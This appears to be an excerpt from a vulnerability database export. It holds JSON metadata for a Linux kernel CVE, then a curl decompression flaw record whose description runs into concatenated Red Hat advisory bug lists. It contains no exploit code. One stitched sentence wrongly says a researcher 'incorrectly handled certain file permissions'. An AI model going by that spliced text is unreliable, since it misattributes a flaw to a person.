},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3621"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3621"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3088"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-32399"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3363"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5071-1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5071-3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1043.47~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1043.47"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4000"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20934"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3653"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3987"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3653"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20934"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "PACKETSTORM",
"id": "164565"
},
{
"db": "PACKETSTORM",
"id": "163926"
},
{
"db": "PACKETSTORM",
"id": "163770"
},
{
"db": "PACKETSTORM",
"id": "164469"
},
{
"db": "PACKETSTORM",
"id": "163995"
},
{
"db": "PACKETSTORM",
"id": "164237"
},
{
"db": "PACKETSTORM",
"id": "164666"
},
{
"db": "PACKETSTORM",
"id": "164652"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-380980",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-22543",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164565",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163926",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163770",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164469",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163995",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164237",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164666",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164652",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-22543",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-05-26T00:00:00",
"db": "VULHUB",
"id": "VHN-380980",
"ident": null
},
{
"date": "2021-05-26T00:00:00",
"db": "VULMON",
"id": "CVE-2021-22543",
"ident": null
},
{
"date": "2021-10-20T15:47:57",
"db": "PACKETSTORM",
"id": "164565",
"ident": null
},
{
"date": "2021-08-28T13:22:22",
"db": "PACKETSTORM",
"id": "163926",
"ident": null
},
{
"date": "2021-08-10T14:49:29",
"db": "PACKETSTORM",
"id": "163770",
"ident": null
},
{
"date": "2021-10-12T15:33:21",
"db": "PACKETSTORM",
"id": "164469",
"ident": null
},
{
"date": "2021-08-31T16:27:27",
"db": "PACKETSTORM",
"id": "163995",
"ident": null
},
{
"date": "2021-09-22T16:24:38",
"db": "PACKETSTORM",
"id": "164237",
"ident": null
},
{
"date": "2021-10-26T19:34:32",
"db": "PACKETSTORM",
"id": "164666",
"ident": null
},
{
"date": "2021-10-26T15:31:16",
"db": "PACKETSTORM",
"id": "164652",
"ident": null
},
{
"date": "2021-05-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1684",
"ident": null
},
{
"date": "2022-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-007425",
"ident": null
},
{
"date": "2021-05-26T11:15:08.623000",
"db": "NVD",
"id": "CVE-2021-22543",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-04-01T00:00:00",
"db": "VULHUB",
"id": "VHN-380980",
"ident": null
},
{
"date": "2022-04-01T00:00:00",
"db": "VULMON",
"id": "CVE-2021-22543",
"ident": null
},
{
"date": "2022-07-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1684",
"ident": null
},
{
"date": "2022-02-10T08:59:00",
"db": "JVNDB",
"id": "JVNDB-2021-007425",
"ident": null
},
{
"date": "2024-05-29T20:15:09.870000",
"db": "NVD",
"id": "CVE-2021-22543",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "164237"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Buffer Error Vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
}
],
"trust": 0.6
}
}
VAR-202206-1900
Vulnerability from variot - Updated: 2026-04-10 23:28curl < 7.84.0 supports "chained" HTTP compression algorithms, meaning that a serverresponse can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.The use of such a decompression chain could result in a "malloc bomb", makingcurl end up spending enormous amounts of allocated heap memory, or trying toand returning out of memory errors. Harry Sintonen incorrectly handled certain file permissions. An attacker could possibly use this issue to expose sensitive information. This issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/
Security fixes:
-
golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
-
moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129)
-
nodejs16: CRLF injection in node-undici (CVE-2022-31150)
-
nodejs/undici: Cookie headers uncleared on cross-origin redirect (CVE-2022-31151)
-
vm2: Sandbox Escape in vm2 (CVE-2022-36067)
Bug fixes:
-
RHACM 2.4 using deprecated APIs in managed clusters (BZ# 2041540)
-
vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes (BZ# 2074766)
-
cluster update status is stuck, also update is not even visible (BZ# 2079418)
-
Policy that creates cluster role is showing as not compliant due to Request entity too large message (BZ# 2088486)
-
Upgraded from RHACM 2.2-->2.3-->2.4 and cannot create cluster (BZ# 2089490)
-
ACM Console Becomes Unusable After a Time (BZ# 2097464)
-
RHACM 2.4.6 images (BZ# 2100613)
-
Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster (BZ# 2102436)
-
ManagedClusters in Pending import state after ACM hub migration (BZ# 2102495)
-
Bugs fixed (https://bugzilla.redhat.com/):
2041540 - RHACM 2.4 using deprecated APIs in managed clusters 2074766 - vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes 2079418 - cluster update status is stuck, also update is not even visible 2088486 - Policy that creates cluster role is showing as not compliant due to Request entity too large message 2089490 - Upgraded from RHACM 2.2-->2.3-->2.4 and cannot create cluster 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add 2097464 - ACM Console Becomes Unusable After a Time 2100613 - RHACM 2.4.6 images 2102436 - Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster 2102495 - ManagedClusters in Pending import state after ACM hub migration 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2109354 - CVE-2022-31150 nodejs16: CRLF injection in node-undici 2121396 - CVE-2022-31151 nodejs/undici: Cookie headers uncleared on cross-origin redirect 2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2
- Bugs fixed (https://bugzilla.redhat.com/):
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read 2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header 2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
- JIRA issues fixed (https://issues.jboss.org/):
LOG-2647 - Add link to log console from pod views LOG-2801 - After upgrade all logs are stored in app indices LOG-2917 - Changing refresh interval throws error when the 'Query' field is empty
- This advisory contains the following OpenShift Virtualization 4.12.0 images:
Security Fix(es):
-
golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
-
kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
-
golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
-
golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
-
golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
-
golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
-
golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
-
golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
-
golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
-
golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
-
golang: syscall: faccessat checks wrong group (CVE-2022-29526)
-
golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
-
golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
-
golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
-
golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
-
golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
-
golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
-
golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
RHEL-8-CNV-4.12
============= bridge-marker-container-v4.12.0-24 cluster-network-addons-operator-container-v4.12.0-24 cnv-containernetworking-plugins-container-v4.12.0-24 cnv-must-gather-container-v4.12.0-58 hco-bundle-registry-container-v4.12.0-769 hostpath-csi-driver-container-v4.12.0-30 hostpath-provisioner-container-v4.12.0-30 hostpath-provisioner-operator-container-v4.12.0-31 hyperconverged-cluster-operator-container-v4.12.0-96 hyperconverged-cluster-webhook-container-v4.12.0-96 kubemacpool-container-v4.12.0-24 kubevirt-console-plugin-container-v4.12.0-182 kubevirt-ssp-operator-container-v4.12.0-64 kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55 kubevirt-tekton-tasks-copy-template-container-v4.12.0-55 kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55 kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55 kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55 kubevirt-tekton-tasks-operator-container-v4.12.0-40 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55 kubevirt-template-validator-container-v4.12.0-32 libguestfs-tools-container-v4.12.0-255 ovs-cni-marker-container-v4.12.0-24 ovs-cni-plugin-container-v4.12.0-24 virt-api-container-v4.12.0-255 virt-artifacts-server-container-v4.12.0-255 virt-cdi-apiserver-container-v4.12.0-72 virt-cdi-cloner-container-v4.12.0-72 virt-cdi-controller-container-v4.12.0-72 virt-cdi-importer-container-v4.12.0-72 virt-cdi-operator-container-v4.12.0-72 virt-cdi-uploadproxy-container-v4.12.0-71 virt-cdi-uploadserver-container-v4.12.0-72 virt-controller-container-v4.12.0-255 virt-exportproxy-container-v4.12.0-255 virt-exportserver-container-v4.12.0-255 virt-handler-container-v4.12.0-255 virt-launcher-container-v4.12.0-255 virt-operator-container-v4.12.0-255 virtio-win-container-v4.12.0-10 vm-network-latency-checkup-container-v4.12.0-89
- Solution:
Before applying this update, you must apply all previously released errata relevant to your system.
To apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1719190 - Unable to cancel live-migration if virt-launcher pod in pending state
2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2040377 - Unable to delete failed VMIM after VM deleted
2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed
2052556 - Metric "kubevirt_num_virt_handlers_by_node_running_virt_launcher" reporting incorrect value
2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements
2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString
2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control
2060499 - [RFE] Cannot add additional service (or other objects) to VM template
2069098 - Large scale |VMs migration is slow due to low migration parallelism
2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass
2071491 - Storage Throughput metrics are incorrect in Overview
2072797 - Metrics in Virtualization -> Overview period is not clear or configurable
2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers
2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode
2086551 - Min CPU feature found in labels
2087724 - Default template show no boot source even there are auto-upload boot sources
2088129 - [SSP] webhook does not comply with restricted security context
2088464 - [CDI] cdi-deployment does not comply with restricted security context
2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR
2089744 - HCO should label its control plane namespace to admit pods at privileged security level
2089751 - 4.12.0 containers
2089804 - 4.12.0 rpms
2091856 - ?Edit BootSource? action should have more explicit information when disabled
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add
2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer
2093771 - The disk source should be PVC if the template has no auto-update boot source
2093996 - kubectl get vmi API should always return primary interface if exist
2094202 - Cloud-init username field should have hint
2096285 - KubeVirt CR API documentation is missing docs for many fields
2096780 - [RFE] Add ssh-key and sysprep to template scripts tab
2097436 - Online disk expansion ignores filesystem overhead change
2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP
2099556 - [RFE] Add option to enable RDP service for windows vm
2099573 - [RFE] Improve template's message about not editable
2099923 - [RFE] Merge "SSH access" and "SSH command" into one
2100290 - Error is not dismissed on catalog review page
2100436 - VM list filtering ignores VMs in error-states
2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS
2100629 - Update nested support KBASE article
2100679 - The number of hardware devices is not correct in vm overview tab
2100682 - All hardware devices get deleted while just delete one
2100684 - Workload profile are not editable during creation and after creation
2101144 - VM filter has two "Other" checkboxes which are triggered together
2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode
2101167 - Edit buttons clickable area is too large.
2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id
2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state
2101390 - Easy to miss the "tick" when adding GPU device to vm via UI
2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id
2101423 - wrong user name on using ignition
2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page
2101445 - "Pending changes - Boot Order"
2101454 - Cannot add PVC boot source to template in 'Edit Boot Source Reference' view as a non-priv user
2101499 - Cannot add NIC to VM template as non-priv user
2101501 - NAME parameter in VM template has no effect.
2101628 - non-priv user cannot load dataSource while edit template's rootdisk
2101667 - VMI view is not aligned with vm and tempates
2101681 - All templates are labeling "source available" in template list page
2102074 - VM Creation time on VM Overview Details card lacks string
2102125 - vm clone modal is displaying DV size instead of PVC size
2102132 - align the utilization card of single VM overview with the design
2102138 - Should the word "new" be removed from "Create new VirtualMachine from catalog"?
2102256 - Add button moved to right
2102448 - VM disk is deleted by uncheck "Delete disks (1x)" on delete modal
2102475 - Template 'vm-template-example' should be filtered by 'Fedora' rather than 'Other'
2102561 - sysprep-info should link to downstream doc
2102737 - Clone a VM should lead to vm overview tab
2102740 - "Save" button on vm clone modal should be "Clone"
2103806 - "404: Not Found" appears shortly by clicking the PVC link on vm disk tab
2103807 - PVC is not named by VM name while creating vm quickly
2103817 - Workload profile values in vm details should align with template's value
2103844 - VM nic model is empty
2104331 - VM list page scroll up automatically
2104402 - VM create button is not enabled while adding multiple environment disks
2104422 - Storage status report "OpenShift Data Foundation is not available" even the operator is installed
2104424 - Enable descheduler or hide it on template's scheduling tab
2104479 - [4.12] Cloned VM's snapshot restore fails if the source VM disk is deleted
2104480 - Alerts in VM overview tab disappeared after a few seconds
2104785 - "Add disk" and "Disks" are on the same line
2104859 - [RFE] Add "Copy SSH command" to VM action list
2105257 - Can't set log verbosity level for virt-operator pod
2106175 - All pages are crashed after visit Virtualization -> Overview
2106963 - Cannot add configmap for windows VM
2107279 - VM Template's bootable disk can be marked as bootable
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse functions
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal
2108339 - datasource does not provide timestamp when updated
2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed
2109818 - Upstream metrics documentation is not detailed enough
2109975 - DataVolume fails to import "cirros-container-disk-demo" image
2110256 - Storage -> PVC -> upload data, does not support source reference
2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls
2111240 - GiB changes to B in Template's Edit boot source reference modal
2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics
2111328 - kubevirt plugin console crashed after visit vmi page
2111378 - VM SSH command generated by UI points at api VIP
2111744 - Cloned template should not label app.kubernetes.io/name: common-templates
2111794 - the virtlogd process is taking too much RAM! (17468Ki > 17Mi)
2112900 - button style are different
2114516 - Nothing happens after clicking on Fedora cloud image list link
2114636 - The style of displayed items are not unified on VM tabs
2114683 - VM overview tab is crashed just after the vm is created
2115257 - Need to Change system-product-name to "OpenShift Virtualization" in CNV-4.12
2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass
2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items
2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates
2116225 - The filter keyword of the related operator 'Openshift Data Foundation' is 'OCS' rather than 'ODF'
2116644 - Importer pod is failing to start with error "MountVolume.SetUp failed for volume "cdi-proxy-cert-vol" : configmap "custom-ca" not found"
2117549 - Cannot edit cloud-init data after add ssh key
2117803 - Cannot edit ssh even vm is stopped
2117813 - Improve descriptive text of VM details while VM is off
2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs
2118257 - outdated doc link tolerations modal
2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format
2119069 - Unable to start windows VMs on PSI setups
2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2119309 - readinessProbe in VM stays on failed
2119615 - Change the disk size causes the unit changed
2120907 - Cannot filter disks by label
2121320 - Negative values in migration metrics
2122236 - Failing to delete HCO with SSP sticking around
2122990 - VMExport should check APIGroup
2124147 - "ReadOnlyMany" should not be added to supported values in memory dump
2124307 - Ui crash/stuck on loading when trying to detach disk on a VM
2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it
2124555 - View documentation link on MigrationPolicies page des not work
2124557 - MigrationPolicy description is not displayed on Details page
2124558 - Non-privileged user can start MigrationPolicy creation
2124565 - Deleted DataSource reappears in list
2124572 - First annotation can not be added to DataSource
2124582 - Filtering VMs by OS does not work
2124594 - Docker URL validation is inconsistent over application
2124597 - Wrong case in Create DataSource menu
2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile
2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state
2127787 - Expose the PVC source of the dataSource on UI
2127843 - UI crashed by selecting "Live migration network"
2127931 - Change default time range on Virtualization -> Overview -> Monitoring dashboard to 30 minutes
2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer
2128002 - Error after VM template deletion
2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards
2128872 - [4.11]Can't restore cloned VM
2128948 - Cannot create DataSource from default YAML
2128949 - Cannot create MigrationPolicy from example YAML
2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2129013 - Mark Windows 11 as TechPreview
2129234 - Service is not deleted along with the VM when the VM is created from a template with service
2129301 - Cloud-init network data don't wipe out on uncheck checkbox 'Add network data'
2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook
2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV
2130588 - crypto-policy : Common Ciphers support by apiserver and hco
2130695 - crypto-policy : Logging Improvement and publish the source of ciphers
2130909 - Non-privileged user can start DataSource creation
2131157 - KV data transfer rate chart in VM Metrics tab is not displayed
2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough
2131674 - Bump virtlogd memory requirement to 20Mi
2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11
2132682 - Default YAML entity name convention.
2132721 - Delete dialogs
2132744 - Description text is missing in Live Migrations section
2132746 - Background is broken in Virtualization Monitoring page
2132783 - VM can not be created from Template with edited boot source
2132793 - Edited Template BSR is not saved
2132932 - Typo in PVC size units menu
2133540 - [pod security violation audit] Audit violation in "cni-plugins" container should be fixed
2133541 - [pod security violation audit] Audit violation in "bridge-marker" container should be fixed
2133542 - [pod security violation audit] Audit violation in "manager" container should be fixed
2133543 - [pod security violation audit] Audit violation in "kube-rbac-proxy" container should be fixed
2133655 - [pod security violation audit] Audit violation in "cdi-operator" container should be fixed
2133656 - [4.12][pod security violation audit] Audit violation in "hostpath-provisioner-operator" container should be fixed
2133659 - [pod security violation audit] Audit violation in "cdi-controller" container should be fixed
2133660 - [pod security violation audit] Audit violation in "cdi-source-update-poller" container should be fixed
2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod
2134672 - [e2e] add data-test-id for catalog -> storage section
2134825 - Authorization for expand-spec endpoint missing
2135805 - Windows 2022 template is missing vTPM and UEFI params in spec
2136051 - Name jumping when trying to create a VM with source from catalog
2136425 - Windows 11 is detected as Windows 10
2136534 - Not possible to specify a TTL on VMExports
2137123 - VMExport: export pod is not PSA complaint
2137241 - Checkbox about delete vm disks is not loaded while deleting VM
2137243 - registery input add docker prefix twice
2137349 - "Manage source" action infinitely loading on DataImportCron details page
2137591 - Inconsistent dialog headings/titles
2137731 - Link of VM status in overview is not working
2137733 - No link for VMs in error status in "VirtualMachine statuses" card
2137736 - The column name "MigrationPolicy name" can just be "Name"
2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly
2138112 - Unsupported S3 endpoint option in Add disk modal
2138119 - "Customize VirtualMachine" flow is not user-friendly because settings are split into 2 modals
2138199 - Win11 and Win22 templates are not filtered properly by Template provider
2138653 - Saving Template prameters reloads the page
2138657 - Setting DATA_SOURCE_ Template parameters makes VM creation fail
2138664 - VM that was created with SSH key fails to start
2139257 - Cannot add disk via "Using an existing PVC"
2139260 - Clone button is disabled while VM is running
2139293 - Non-admin user cannot load VM list page
2139296 - Non-admin cannot load MigrationPolicies page
2139299 - No auto-generated VM name while creating VM by non-admin user
2139306 - Non-admin cannot create VM via customize mode
2139479 - virtualization overview crashes for non-priv user
2139574 - VM name gets "emptyname" if click the create button quickly
2139651 - non-priv user can click create when have no permissions
2139687 - catalog shows template list for non-priv users
2139738 - [4.12]Can't restore cloned VM
2139820 - non-priv user cant reach vm details
2140117 - Provide upgrade path from 4.11.1->4.12.0
2140521 - Click the breadcrumb list about "VirtualMachines" goes to undefined project
2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user
2140627 - Not able to select storageClass if there is no default storageclass defined
2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user
2140808 - Hyperv feature set to "enabled: false" prevents scheduling
2140977 - Alerts number is not correct on Virtualization overview
2140982 - The base template of cloned template is "Not available"
2140998 - Incorrect information shows in overview page per namespace
2141089 - Unable to upload boot images.
2141302 - Unhealthy states alerts and state metrics are missing
2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations
2141494 - "Start in pause mode" option is not available while creating the VM
2141654 - warning log appearing on VMs: found no SR-IOV networks
2141711 - Node column selector is redundant for non-priv user
2142468 - VM action "Stop" should not be disabled when VM in pause state
2142470 - Delete a VM or template from all projects leads to 404 error
2142511 - Enhance alerts card in overview
2142647 - Error after MigrationPolicy deletion
2142891 - VM latency checkup: Failed to create the checkup's Job
2142929 - Permission denied when try get instancestypes
2143268 - Topolvm storageProfile missing accessModes and volumeMode
2143498 - Could not load template while creating VM from catalog
2143964 - Could not load template while creating VM from catalog
2144580 - "?" icon is too big in VM Template Disk tab
2144828 - "?" icon is too big in VM Template Disk tab
2144839 - Alerts number is not correct on Virtualization overview
2153849 - After upgrade to 4.11.1->4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten
2155757 - Incorrect upstream-version label "v1.6.0-unstable-410-g09ea881c" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container
- Description:
Multicluster Engine for Kubernetes 2.0.2 images
Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds.
You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy.
Security updates:
- moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)
- vm2: Sandbox Escape in vm2 (CVE-2022-36067)
Bug fix:
-
MCE 2.0.2 images (BZ# 2104569)
-
Solution:
For multicluster engine for Kubernetes, see the following documentation for details on how to install the images:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/multicluster_engine/index#installing-while-connected-online
- Bugs fixed (https://bugzilla.redhat.com/):
2104569 - MCE 2.0.2 Images 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2
Bug Fix(es):
-
Cloning a Block DV to VM with Filesystem with not big enough size comes to endless loop - using pvc api (BZ#2033191)
-
Restart of VM Pod causes SSH keys to be regenerated within VM (BZ#2087177)
-
Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR (BZ#2089391)
-
[4.11] VM Snapshot Restore hangs indefinitely when backed by a snapshotclass (BZ#2098225)
-
Fedora version in DataImportCrons is not 'latest' (BZ#2102694)
-
[4.11] Cloned VM's snapshot restore fails if the source VM disk is deleted (BZ#2109407)
-
CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls (BZ#2110562)
-
Nightly build: v4.11.0-578: index format was changed in 4.11 to file-based instead of sqlite-based (BZ#2112643)
-
Unable to start windows VMs on PSI setups (BZ#2115371)
-
[4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 (BZ#2128997)
-
Mark Windows 11 as TechPreview (BZ#2129013)
-
4.11.1 rpms (BZ#2139453)
This advisory contains the following OpenShift Virtualization 4.11.1 images.
RHEL-8-CNV-4.11
